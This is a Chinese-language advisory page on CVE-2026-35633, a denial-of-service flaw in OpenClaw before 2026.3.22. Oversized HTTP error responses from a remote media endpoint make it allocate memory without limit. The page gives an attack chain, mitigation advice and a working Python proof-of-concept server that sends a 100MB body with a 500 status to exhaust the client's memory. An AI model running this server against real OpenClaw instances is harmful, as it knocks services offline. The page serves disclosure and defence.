CVE-2026-35633 CVSS 5.3 中危

CVE-2026-35633 OpenClaw远程媒体内存分配漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35633

漏洞类型

拒绝服务

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.22之前的版本在处理远程媒体HTTP错误响应时存在无限制内存分配漏洞。攻击者可利用该漏洞，向远程媒体端点发送带有超大主体的恶意HTTP错误响应。由于应用程序未对内存分配进行边界检查，导致在错误处理发生前消耗过量内存，从而造成资源耗尽及拒绝服务攻击。

技术细节

该漏洞的根源在于OpenClaw在处理远程媒体端点返回的HTTP错误响应时，缺乏对数据流大小的有效验证机制。当应用接收到HTTP错误状态码时，其错误处理逻辑会尝试读取并处理响应主体。由于未设置内存分配上限，攻击者可以通过伪造或控制远程媒体源，发送包含巨大负载（Payload）的HTTP错误响应。OpenClaw在解析此类响应时，会尝试分配与负载大小相匹配的内存空间，导致系统内存被迅速耗尽。鉴于该漏洞通过网络触发且无需身份验证，攻击者可利用此缺陷实施拒绝服务攻击，严重影响目标系统的可用性。

攻击链分析

STEP 1

步骤1：诱导请求

攻击者诱导或等待OpenClaw实例向受攻击者控制的远程媒体端点发起请求。

STEP 2

步骤2：构造恶意响应

攻击者控制的端点返回一个HTTP错误状态码（如500），并在响应头中指定一个非常大的Content-Length，随后发送大量数据。

STEP 3

步骤3：触发漏洞

OpenClaw接收响应并开始处理错误状态，由于未对响应体大小进行校验，尝试分配内存以接收完整的响应体。

STEP 4

步骤4：资源耗尽

大量的内存分配请求导致系统内存被耗尽，服务响应变慢甚至崩溃，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# Simple PoC server acting as a malicious remote media endpoint
# It sends a large HTTP error response to trigger unbounded memory allocation

def start_server(host='0.0.0.0', port=8080):
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind((host, port))
    server_socket.listen(1)
    print(f"[*] Malicious server listening on {host}:{port}")
    
    while True:
        client_socket, addr = server_socket.accept()
        print(f"[*] Connection accepted from {addr}")
        
        # Simulate a large HTTP error response (e.g., 500 Internal Server Error)
        # The large body size triggers the unbounded memory allocation in the client
        large_body = b"X" * (100 * 1024 * 1024) # 100MB payload
        
        http_response = (
            b"HTTP/1.1 500 Internal Server Error\r\n"
            b"Content-Type: text/plain\r\n"
            b"Content-Length: " + str(len(large_body)).encode() + b"\r\n"
            b"\r\n"
        )
        
        # Send headers first
        client_socket.sendall(http_response)
        # Send the large body to consume memory on the victim
        client_socket.sendall(large_body)
        
        client_socket.close()
        print("[*] Payload sent, connection closed.")

if __name__ == "__main__":
    start_server()

影响范围

OpenClaw < 2026.3.22

防御指南

临时缓解措施

建议立即将OpenClaw升级到2026.3.22或更高版本。如果暂时无法升级，应在中间件（如Nginx或API网关）层面对上游响应体的大小进行严格限制，并监控应用内存使用情况，一旦发现异常立即重启服务。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表